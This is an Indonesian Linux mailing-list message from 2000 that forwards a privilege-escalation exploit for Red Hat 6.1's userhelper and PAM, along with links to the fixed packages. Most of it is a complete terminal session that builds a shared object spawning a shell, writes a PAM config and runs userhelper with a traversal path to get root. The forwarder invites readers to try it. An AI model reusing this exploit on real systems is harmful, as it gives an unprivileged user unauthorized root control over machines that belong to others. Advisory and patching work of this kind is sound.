Ini dari milis Linux - Admin ada info Bug.... Cobain aje deh
-- ady --
http://ady.informatika.org
---------- Forwarded message ----------
Date: Mon, 31 Jan 2000 14:32:52 -0800 (PST)
From: awan k <[EMAIL PROTECTED]>
Halo para linuxer....
Sebelumnya saya mohon ijin sama Mas Admin milis ini ngirim email panjang....
Ini ada 'kutipan' exploit dari [EMAIL PROTECTED] [thanx to dildog].Bugnya
berasal dari userhelper dan pam, sebaiknya bagi Anda yg pake Redhat kedua versi
ini segera update menjadi userhelper-1.17 dan pam-0.68-10 yg sudah difix-kan
oleh Redhat di:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
Ini saya copy dari yg saya lakukan [pake script lebih enak]:
[faraoukh@one faraoukh]$ whoami
faraoukh
[faraoukh@one faraoukh]$ cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
[faraoukh@one faraoukh]$ echo -e auth\\trequired\\t$PWD/_pamslam.so >
_pamslam.conf
[faraoukh@one faraoukh]$ chmod 755 _pamslam.conf
[faraoukh@one faraoukh]$ gcc -fPIC -o _pamslam.o -c _pamslam.c
[faraoukh@one faraoukh]$ ld -shared -o _pamslam.so _pamslam.o
[faraoukh@one faraoukh]$ chmod 755 _pamslam.so
[faraoukh@one faraoukh]$ /usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
bash#whoami
root
bash#
http://www.indolinux.com - Nikmati Layanan Personal INDOLINUX ::
http://techscape.net/ - Webhosting: Dual T3 on Dual Pentium III 450Mhz
Only US$1.95/month -> CGI SSL 5MB Unlimited Traffic & Mail FP2000
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]